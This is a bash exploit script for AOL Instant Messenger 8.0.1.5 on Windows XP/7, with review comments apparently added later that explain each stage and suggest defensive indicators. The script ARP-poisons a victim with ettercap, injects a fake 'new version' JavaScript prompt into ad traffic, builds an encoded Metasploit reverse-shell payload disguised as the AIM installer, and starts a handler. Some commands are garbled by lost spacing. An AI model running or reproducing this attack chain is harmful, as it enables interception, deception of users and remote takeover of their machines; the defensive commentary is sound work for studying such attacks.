AOL Instant Messenger 8.0.1.5 Exploit on Win XP/7
#!/bin/bash### AOL Instant Messenger 8.0.1.5 (Jul 2013) Exploit Windows XP/7 tested and working.### Leverages binary file planting to My Documents via AIMs advertisement code.### Little social engineering built in using javascript to try to get them to run the AIM_Install.exe.### Starts a reverse shell back to your handler on 192.168.2.5:443 by default.### Marshall WhittakerATTACKER="192.168.2.10";VICTIM="192.168.2.5";GATEWAY="192.168.2.1";REVPORT="443";PAYLOADSITE="https://dl.dropboxusercontent.com/s/dykenlhdobchjjv/AIM_Install.exe?token_hash=AAE2qGWSZAlAWJKepUu_2fP5UZfg-JTHktBGuu-I4BV34Q&dl=1";mkdir ~/aimpwn;echo"if (tcp.src == 80) {"> ~/aimpwn/aimpwn.filter;echo"if (search(DATA.data, \"atwola\")) {">> ~/aimpwn/aimpwn.filter;echo"replace(\"_blank>\", \"_blank><script>alert('A new version of AOL Instant Messenger is available!');window.location = '$PAYLOADSITE'; setTimeout(function(){alert ('Navigate to your My Documents folder and start the installer by clicking AIM_Install and follow the steps.');}, 1000);</script>\");">> ~/aimpwn/aimpwn.filter;echo"msg(\"PWNT.\n\");">> ~/aimpwn/aimpwn.filter;echo"}">> ~/aimpwn/aimpwn.filter;echo"}">> ~/aimpwn/aimpwn.filter;
### NOTE(review): this listing lost its line breaks and some spacing when the
### page was extracted; the text is reproduced here exactly as found.
### Reading of the first line, for analysts:
###  - ATTACKER, VICTIM, GATEWAY, REVPORT and PAYLOADSITE are the only settings.
###    The header text names 192.168.2.5 as the handler address, but the
###    assignments give that address to VICTIM and 192.168.2.10 to ATTACKER.
###  - The echo statements assemble an ettercap filter source file,
###    ~/aimpwn/aimpwn.filter. The filter acts only on packets whose TCP source
###    port is 80 and whose data contains "atwola" (presumably the ad-serving
###    host name used by the client; confirm), and rewrites "_blank>" so that a
###    <script> element follows it.
###  - The injected script shows a fake "new version" alert, points the window
###    at PAYLOADSITE, and one second later tells the user to open AIM_Install
###    from My Documents. Nothing runs unless the user follows that prompt.
### Defensive reading: the rewrite depends on the matched content arriving over
### port 80, i.e. presumably plain HTTP; an in-path filter of this kind cannot
### match or rewrite content delivered over authenticated TLS. The alert text
### and a <script> element directly after "_blank>" in an ad response are
### content indicators a proxy or IDS can match on.
###
### The next line compiles the filter source into ~/aimpwn/aimpwn.ef with
### etterfilter. The "wget section" text refers to fetching the vendor's
### AIM_Install.exe and copying it into a Metasploit templates directory; as
### rendered here, everything after the first ### on that line is comment text.
etterfilter ~/aimpwn/aimpwn.filter -o ~/aimpwn/aimpwn.ef;### wget section.#wget http://download.newaol.com/aim/win/AIM_Install.exe -O ~/aimpwn/AIM_Install.exe;cp ~/aimpwn/AIM_Install.exe /opt/metasploit/apps/pro/msf3/data/templates/;
### The pipeline below generates a windows/shell/reverse_tcp payload, passes it
### through several encoder rounds, and writes it into an executable that uses
### AIM_Install.exe as its template (-x), saved as ~/aimpwn/AIM_Install.exe.
### Defensive reading: the output carries the installer's file name and is
### built from the real installer, so name and appearance say nothing about
### authenticity. Checking the publisher signature (if the vendor signs the
### installer; confirm) or a known-good hash does. The stacked encoder rounds
### only change the byte pattern of the payload, which is why behavioural
### detection (an "installer" that opens an outbound socket and starts a
### command shell) is more dependable here than static signatures alone.
msfpayload windows/shell/reverse_tcp LHOST=$ATTACKERLPORT=$REVPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -x AIM_Install.exe -t exe -e x86/call4_dword_xor -c 2 -o ~/aimpwn/AIM_Install.exe;### Uncomment wget section and put code to upload AIM_Install.exe to a site if you need to### change ATTACKER IP or port.
### The next line starts ettercap in the background (&) with the compiled
### filter (-F) and ARP poisoning (-M arp:remote) between GATEWAY and VICTIM.
### Defensive reading: on the victim's segment the gateway IP becomes associated
### with a different MAC address. Dynamic ARP inspection on the switch, or ARP
### monitoring that alerts when the gateway's MAC changes, catches this stage
### before any content is rewritten.
ettercap -T-F ~/aimpwn/aimpwn.ef -q-M arp:remote /$GATEWAY/ /$VICTIM/ &
### The last line starts a Metasploit multi/handler that waits for the payload
### to connect back to ATTACKER on REVPORT.
### Defensive reading: on the wire this is a workstation opening a connection
### to REVPORT (443 by default) on another host; with the sample addresses that
### host is on the same subnet. The payload is a plain TCP shell, so port-443
### traffic that does not begin with a TLS handshake is a usable anomaly.
msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=$ATTACKERlport=$REVPORT E;